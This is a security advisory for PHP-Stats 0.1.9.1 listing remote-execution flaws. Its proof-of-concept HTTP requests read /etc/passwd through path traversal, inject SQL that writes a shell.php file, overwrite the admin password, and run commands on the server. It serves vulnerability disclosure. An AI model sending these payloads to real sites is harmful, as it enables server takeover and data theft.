|
------------- PHP-Stats <= 0.1.9.1 remote commands execution -------------------
software:
site: http://www.phpstats.net/
description: Open source statistical package for PHP enabled web sites
--------------------------------------------------------------------------------
i) vulnerable code in admin.php (and in nearly every scripts...) at line 65:
...
if(isset($_POST['option'])) { while (list ($key, $value) = each ($tmpOption)) $option[$key]=$value; }
...
you can overwrite at run-time the "option[]" array...,
raising SQL injection, arbitrary local inclusion and php injection issues, poc:
i.a) arbitrary local inclusion (with magic_quotes_gpc off):
i.a1)
POST [path]admin.php?do=0 HTTP/1.1\r\n";
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close
option=&option[clear_cache]=1&option[language]=../../../../../..
/etc/passwd[null char]
i.a2)
POST [path]admin.php?do=0 HTTP/1.1\r\n";
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close
option=&option[template]=../../../../../../etc/passwd[null char]
i.b) SQL injection - you can inject arbitrary SQL commands through the table
prefix, regardless of magic_quotes_gpc settings:
POST [path]admin.php?do=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close
option=&option[prefix]=[SQL]
i.c) PHP code injection - you can grant administrative privileges, overwriting
"option[admin_pass]" value and building a MD5 admin cookie on new value.
Now you can inject a shell in two different ways by administrative features,
poc:
i.c1)
POST [path]admin.php?action=esclusioni&opzioni=excfol HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: php_stats_cache=1; pass_cookie=[md5 hash of "suntzu"]
Host: [somehost]
Content-Length: [data_length]
Connection: Close
option=&option[admin_pass]=suntzu&option_new=[SHELL]
now you can launch commands including option/php-stats-options.php script,poc:
POST [path]admin.php?cmd=netstat%20-ano&do=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close
option=&option[language]=../option/php-stats-options.php[null char]
i.c2) the most chritical, this works regardless of any php.ini settings, you
can inject a shell in config.php and launch commands from it.
Poc exploit here:
http://retrogod.altervista.org/php_stats_0191_xpl.html
--------------------------------------------------------------------------------
ii) vulnerable code in click.php at line 18:
...
if(isset($_SERVER['REMOTE_ADDR'])) $ip=(isset($_SERVER['HTTP_PC_REMOTE_ADDR']) ?
$_SERVER['HTTP_PC_REMOTE_ADDR'] : $_SERVER['REMOTE_ADDR']);
...
and line 65:
...
$result=sql_query("SELECT visitor_id FROM $option[prefix]_cache WHERE user_id='$ip' LIMIT 1");
...
you can inject sql commands through PC_REMOTE_ADDR http header, poc:
GET [path]click.php?id=1&get=1 HTTP/1.1
PC_REMOTE_ADDR: 'UNION SELECT '[code]'INTO OUTFILE 'shell.php' FROM php_stats_cache/*
Host: [host]
Connection: Close
--------------------------------------------------------------------------------
iii) information disclosure, you can go to:
http://[target]/[path]/checktables.php
to see at screen database table_prefix, making easier the exploitation process...
--------------------------------------------------------------------------------
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/php_stats_0191_adv.html
--------------------------------------------------------------------------------
|
